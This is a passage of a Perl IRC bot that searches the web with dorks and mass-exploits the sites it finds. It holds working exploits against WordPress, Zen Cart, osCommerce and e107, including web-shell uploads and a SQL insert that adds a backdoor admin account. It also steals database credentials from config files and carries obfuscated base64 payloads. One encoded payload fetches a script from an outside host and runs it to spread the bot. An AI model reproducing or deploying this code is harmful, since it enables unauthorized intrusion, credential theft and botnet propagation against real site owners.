    elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine);}
}

##################################################################################

sub se_start() {
my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
    if ($gps ==1) {
    if ($engine =~ /jackae/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAE",$type); } exit; } }
    if ($engine =~ /jackar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAR",$type); } exit; } }
    if ($engine =~ /jackat/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAT",$type); } exit; } }
    if ($engine =~ /jackau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKAU",$type); } exit; } }
    if ($engine =~ /jackbr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBR",$type); } exit; } }
    if ($engine =~ /jackca/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCA",$type); } exit; } }
    if ($engine =~ /jackcl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCL",$type); } exit; } }
    if ($engine =~ /jackcn/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCN",$type); } exit; } }
    if ($engine =~ /jackcom/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCoM",$type); } exit; } }
    if ($engine =~ /jackcz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKCZ",$type); } exit; } }
    if ($engine =~ /jackde/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDE",$type); } exit; } }
    if ($engine =~ /jackdk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKDK",$type); } exit; } }
    if ($engine =~ /jackes/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKES",$type); } exit; } }
    if ($engine =~ /jackeu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKEU",$type); } exit; } }
    if ($engine =~ /jackfr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKFR",$type); } exit; } }
    if ($engine =~ /jackhu/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKHU",$type); } exit; } }
    if ($engine =~ /jackid/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKID",$type); } exit; } }
    if ($engine =~ /jackil/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIL",$type); } exit; } }
    if ($engine =~ /jackin/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIN",$type); } exit; } }
    if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKInfO",$type); } exit; } }
    if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIR",$type); } exit; } }
    if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIT",$type); } exit; } }
    if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKJP",$type); } exit; } }
    if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKKR",$type); } exit; } }
    if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMX",$type); } exit; } }
    if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMY",$type); } exit; } }
    if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNeT",$type); } exit; } }
    if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNL",$type); } exit; } }
    if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKOrG",$type); } exit; } }
    if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPH",$type); } exit; } }
    if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPL",$type); } exit; } }
    if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRO",$type); } exit; } }
    if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRU",$type); } exit; } }
    if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKTH",$type); } exit; } }
    if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUA",$type); } exit; } }
    if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUK",$type); } exit; } }
    if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUS",$type); } exit; } }
    if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKSI",$type); } exit; } }
    if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBE",$type); } exit; } }
    if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBIZ",$type); } exit; } }
    }
    if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } }
    if ($gps2 ==1) {
    if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } exit; } }
    if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type); } exit; } }
    if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } }
    if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } }
    if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit; } }
    if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit; } }
    if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } exit; } }
    if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } }
    if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } exit; } }
    if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit; } }
    if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } }
    if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } }
    if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } }
    }
}


###### EXPLOITING #######
sub rfg_exploit() {
    my $chan = $_[0];
    my $bugz = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$rfglogo15$engine 9Finished 15for 9$dork "); }
            my $test  = "http://garguritos.com/rfg.php?url=http://".$site;
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                my $html  = &get_content($test);
                my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
                if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\">Your shell/){
                    my $vuln = $1; my $qr = $2;
                    my $upl = "http://".$vuln.$vpath.$qr."wget%20".$thumbshell;
                    my $crut = &get_content($upl);
                    if ($crut =~ /3xploit/) {
                    my $shell = "http://".$vuln.$vpath."bad.php";
                    my $check = &get_content($shell);
                    if ($check =~ /STUNSHELL/i){
                        my $safe = ""; my $os = ""; my $uid = "";
                        if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
                        if ($check =~ m/color=red><b>&nbsp;&nbsp;&nbsp;(.*?)<br>/) {$os = $1;}
                        if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
                        &msg("$admin","$rfglogo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$chan","$rfglogo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                    } else {
                        &msg("$chan","$rfglogo15$engine 9<4=9>9 VulN 9<4=9>9 http://".$vuln.$vpath.$qr."15 ");
                    }
                    }
                }
            } exit; }
        }
    }
}

sub zen_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$zenlogo15$engine 9Finished 15for 9$dork "); }
            my $test  = "http://".$site.$bug;
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                my $html  = &get_content($test);
                if ($html =~ /zc_install/){
                    &zen_query($chan,$site,$test,$engine);
                }
            } exit; }
        }
    }
}

sub zen_query() {
    my $chan = $_[0];
    my $url = $_[1];
    my $test = $_[2];
    my $engine = $_[3];
    my $code  = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
    my $req = HTTP::Request->new(POST => $test);
    $req->content_type("application/x-www-form-urlencoded");
    $req->content("query_string=".$code);
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(3);
    my $res = $ua->request($req);
    my $data = $res->as_string;
    if ( $data =~ /1 statements processed/i ) {
        &msg("$chan","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$url."admin/login.php ");
        &msg("$admin","$zenlogo15$engine 4<9=4>15 VulN 4<9=4>9 http://".$url."admin/login.php ");
    }
    elsif ( $data =~ /Duplicate entry/i ) {
        &msg("$chan","$zenlogo15$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php )");
        &msg("$admin","$zenlogo15$engine 4<9=4>9 SuccesS 4<9=4>9 http://".$url."admin/login.php ");
    }
}

sub osco_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$oscologo15$engine 9Finished 15for 9$dork "); }
            my $cat = "http://".$site."admin/categories.php/login.php";
            my $fm = "http://".$site."admin/file_manager.php/login.php";
            my $bm = "http://".$site."admin/banner_manager.php/login.php";
            my $shell = "http://".$site."images/lobex.php";
            my $dumper = "http://".$site."images/lobexdb.php";
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
                my $coba = &get_content($cat);sleep(1);
                my $cob2 = &get_content($fm);sleep(1);
                my $cob3 = &get_content($bm);sleep(1);
                if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
                    my $test = $cat."?action=download&filename=/includes/configure.php";
                    my $cek = &get_content($test);
                    if ($cek =~ /http:\/\//) {
                        &osql_xpl($test,$chan,$site,$engine);
                    }
                    my $aplod = LWP::UserAgent->new;
                    my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
                    my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
                    my $cekap = &get_content($shell);
                    if ($cekap =~ /UnKnown - Simple Shell/) {
                        my $safe = ""; my $os = ""; my $uid = "";
                        if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
                        if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
                        if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
                        &msg("$chan","$oscologo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$admin","$oscologo15$engine 9<4=9>9 sHeLL 9<4=9>9 ".$shell."15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$chan","$oscologo15$engine 9<4=9>9 Dumper 9<4=9>9 $dumper ");sleep(1);
                    }
                }
                if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
                    my $test2 = $fm."?action=download&filename=/includes/configure.php";
                    my $cek2 = &get_content($test2);
                    if ($cek2 =~ /http:\/\//) {
                        &osql_xpl($test2,$chan,$site,$engine);
                    }
                    my $aplod2 = LWP::UserAgent->new;
                    my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
                    my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
                    my $cekap = &get_content($shell);
                    if ($cekap =~ /UnKnown - Simple Shell/) {
                        my $safe = ""; my $os = ""; my $uid = "";
                        if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
                        if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
                        if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
                        &msg("$chan","$oscologo15$engine 9<4=9>9 sHeLL 9<4=9>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$admin","$oscologo15$engine 9<4=9>9 sHeLL 9<4=9>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$chan","$oscologo15$engine 9<4=9>9 Dumper 9<4=9>9 $dumper ");sleep(1);
                    }
                }
                if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
                    my $test3 = $bm."?action=download&filename=/includes/configure.php";
                    my $cek3 = &get_content($test3);
                    if ($cek3 =~ /http:\/\//) {
                        &osql_xpl($test3,$chan,$site,$engine);
                    }
                    my $aplod3 = LWP::UserAgent->new;
                    my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
                    my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
                    my $cekap = &get_content($shell);
                    if ($cekap =~ /UnKnown - Simple Shell/) {
                        my $safe = ""; my $os = ""; my $uid = "";
                        if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
                        if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
                        if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
                        &msg("$chan","$oscologo15$engine 9<4=9>9 sHeLL 9<4=9>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$admin","$oscologo15$engine 9<4=9>9 sHeLL 9<4=9>9 $shell15 (SafeMode=$safe) (OS=$os) uid=$uid ");
                        &msg("$chan","$oscologo15$engine 9<4=9>9 Dumper 9<4=9>9 $dumper ");sleep(1);
                    }
                }
                } exit;
            }
        }
    }
}

sub osql_xpl() {
    my $url    = $_[0];
    my $chan   = $_[1];
    my $site   = $_[2];
    my $engine = $_[3];
    my $request = HTTP::Request->new(GET=>$url);
    my $browser = LWP::UserAgent->new();
    $browser->timeout(10);
    my $response = $browser->request($request);
    my @dbsinfo;
    if ($response->is_success) {
        my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
        my $res = $response->as_string;
        if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
            $dpath = $1;
            &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DIR path: 4 $dpath");
        }
        if ($res =~ m/'DB_SERVER', '(.*)'/g) {
            $dbserver = $1;
            &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB Server: 4 $dbserver");
        }
        if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
            $dbuser = $1;
            &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB username: 4 $dbuser");
        }
        if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
            $dbpass = $1;
            &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB password: 4 $dbpass");
        }
        if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
            $dbname = $1;
            &msg("$chan","$oscosqllogo15$engine 4<9=4>9 http://".$site." 15[+]DB database: 4 $dbname");
        }
        my $hosts = "http://".$site;
        if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
            $host = $2;
            &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
            if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
            &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
        }
    }
}

sub e107_exploit() {
    my $chan = $_[0];
    my $bug = $_[1];
    my $simpan = $_[2];
    my $dork = $_[3];
    my $engine = $_[4];
    my $count = 0;
    my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
    my $num = scalar(@totexploit);
    if ($num > 0){
        foreach my $site(@totexploit){
        $count++;
        if ($count == $num-1) { &msg("$chan","$e107logo15$engine 9Finished 15for 9$dork "); }
            my $test = "http://".$site.$bug;
            my $shellz = "http://".$site."/images/lobex.php";
            my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
            if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
            my $html = &e107_rce_query($test,$code);
            if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
                my $sys = $1;
                my $upload = "";
                my $res = &e107_rce_query($test);
                if ($res =~ /lobexxx/) {
                    my $check = &get_content($shellz);
                    if ($check =~ /GIF89a/) {
                        &msg("$chan","$e107logo15$engine 9<4=9>9 SheLL 9<4=9>9 $shellz ");sleep(2);
                    }
                } else { &msg("$chan","$e107logo15$engine 9<4=9>15 System 9<4=9>9 $test 15($sys) ");sleep(2); }
            }
        } exit; }
        }
    }
}

sub e107_rce_query() {
    my $url = $_[0];
    my $code = encode_base64('echo "lobexxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVNNEVQNThWZndINCtzcXFSWkZPT2trRGhwcFRBaFVhQWZsbXZhK0FJcmN4SHE5SkdseE8yZDdpUDkrY0R2cHk3TExaTkpKVDFwMG5uUmVIbzhuWnorVXMyVjdXRVNsbU9DSjBsRjN2MzI4dlZLbEZES1J0QlJGTXo3MTk0MlJXcEMvdzVTaTJtSWxaQlRIdmY3MXJUY21uOG1EYXQ5aC8vUzB2ZFZ0Y1lycFIwZGNveER0QTZrMXAzQnJOSVRCMzlIZ0ZsOE9oemZKY2o4ZTRudmpjL3p6aG5zUS9UV0s0bTR5R3ZRY1lDeXlCU0F3eVFoTkVENVN3S0NwVTJyY2hEWjhlV0NLV1hXeG4wU0FmbkdjSlVhbzBqUEdwQkFaOVpiMUw0RjY5TlJGTkswazB3c0lINTllVWNsSS96eUNBUDJMQzN6OERDcmtpcjZDdWdhUVdscHlWbklJR1hSUDZmR0NrNEw2eTQ0ODk1MmNucDhQUUthNmRQcWdoWVFnM3lNTm9xditNRTBqRllUbFBoNExOYWFLeU44T1AwR05KVlZTZ1dvUnRpcmhYWHhXRk12UkoyWWtoS09aMXVWRXA5UG9CSW8xcmR6eDNnMktxWHlrcG9pNmd6dU93TnF6OGdvSjVxWkJlYXQrWk9UMUNhK0ViWUZyLzk0cXhDWitNemEvVk1OYkw4MEZwM054ek1Rb1JNbVVycytBRjU4TmJUZkQ1S0wzZEdkOWJSVnNhUTR5cWpSUTRRcG8zajhiWFZMWHczSFE3dys5K3dCcTV1VWU0M1plQWRROEswbVVPUTFneE0yRVZlb2thZmxwa1F2WWFRMzh3UEU1YmRQNEhMbnhBVU02RXdocU5kTTVQUm54UDdpWVpyU0hiMXM3aW5RMHo3c2Q1KzJPcGYwejNkUzBpWUNMcHRnL05Qd0ZwU0tIUnZ2NTBINEFhNEtEY3U0QWFqdmpKYmtGeHFTQ1VBK3hqd04xTlFFRDZLT3QwV0lIdVAzV0hDTWdRRE1WeTA4YnFVdkFJMUZMcGdnd21xNmMwNitkNjNLOUtaODVVVldJemJFbWxUM1M5bk9ZVnNWR0Rlc01sV1pWaHN5TXBmUE0zYlhVbU54UnRxcERkaWxZb1h6ajMvVTZuaDFWNjlveHZweGw2M2Z2SFJpSHBMcVNIQmxZQU9EbWhKL1c3R25hZVB1M1JkemQvWjhjZ1A1K2tqcVJrY3dEeVhHQkNyTlhRT2ticzFzUnNScUVHSis4THVpWktBckNzMVBBTHVOeXBaRmVsRFRFbW43UkdCbU5VSndXR2Q3MHh0VzRZQ3UvaTRQUkk4a3IrL3NCOEIxRzJZbHF2RXdwaFFPeUlZb3ExNnlFbDQ3RjdYSlJrNmJ5cGgzVHpYKzBNQ3BtVGpKbndXVjMyK2dZOUl0aGN5ekxLSytyU0s3MkRjQUUrTFhiektiNWlldWNoeTdhcTBoYzA3bHlINkgxSXRiaUd6VWQrK0RYT2crblp2T0FSSm9UcFU5YU5naXV5TnFIeDIycHJYaHJVTjYxRlhnVXUvVWN1VXl5bFhKeHpIbjdaV2dIYVUyMmpvWkdsd09rSit1d1dObDU0ZmpXZUNUeDdnRjBUbWtPQy9GVkV4ZWRjNGtCK04razZLSlpIQTAyNzdLYXdLYXBpL2tob1ZtM1lZODBSZ0ZpVnBxWnZmQ00zRTlURy82NFYwYjQ5d2QyTUFWZmg0UGxhR2VPOERGdHRyZnRoY2oxMERjcXd4MnhrdFhPSXJOaUxtQTFLeW1oWDVqU0N0NHNDNlYyNGEyVjJ5MGxYZCtDYzAySXBNUmFpb2tNRTZmQ2cvMzlhbFdLdVd4dGRQRXVsR0tTdDByMFFjTmZqOWwyWmJocFBwejhDdz09IikpKTsKJGZpY2hpZXIgPSBmb3BlbignLi9pbWFnZXMvbG9iZXgucGhwJywndycpOwpmd3JpdGUoJGZpY2hpZXIsICRjKTsKZmNsb3NlKCRmaWNoaWVyKTs=";
    my $req = HTTP::Request->new(POST => $url);
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
    my $ua = LWP::UserAgent->new(agent => $uagent);
    $ua->timeout(7);
    my $res = $ua->request($req);
    return $res->content;
}

sub e107_spread_query() {
    my $url = $_[0];
    my $code = "ZWNobyAidjBwQ3Izdzxicj4iOwplY2hvICJzeXM6Ii5waHBfdW5hbWUoKS4iPGJyPiI7CiRjbWQ9ImVjaG8gbm9iMGR5Q3IzdztjZCAvdG1wO3JtIC1yZiBkb3IuKiAqLnR4dC4qO2ZldGNoIGh0dHA6Ly9rZGxnLm9yZy9jYWNoZS8uc2V0L2VjLnR4dDtwZXJsIGVjLnR4dDtybSAtcmYgZWMudHh0O3dnZXQgaHR0cDovL2tkbGcub3JnL2NhY2hlLy5zZXQvZWMudHh0O3BlcmwgZWMudHh0O3JtIC1yZiBlYy50eHQ7Y3VybCAtTyBodHRwOi8va2RsZy5vcmcvY2FjaGUvLnNldC9lYy50eHQ7cGVybCBlYy50eHQ7cm0gLXJmIGVjLnR4dDtsd3AtZG93bmxvYWQgaHR0cDovL2tkbGcub3JnL2NhY2hlLy5zZXQvZWMudHh0O3BlcmwgZWMudHh0O2NkIC92YXIvdG1wO3JtIC1yZiBkb3IuKiAqLmpwZy4qO2ZldGNoIGh0dHA6Ly9rZGxnLm9yZy9jYWNoZS8uc2V0L2VjLnR4dDtwZXJsIGVjLnR4dDtybSAtcmYgZWMudHh0O3dnZXQgaHR0cDovL2tkbGcub3JnL2NhY2hlLy5zZXQvZWMudHh0O3BlcmwgZWMudHh0O3JtIC1yZiBlYy50eHQ7Y3VybCAtTyBodHRwOi8va2RsZy5vcmcvY2FjaGUvLnNldC9lYy50eHQ7cGVybCBlYy50eHQ7cm0gLXJmIGVjLnR4dDtsd3AtZG93bmxvYWQgaHR0cDovL2tkbGcub3JnL2NhY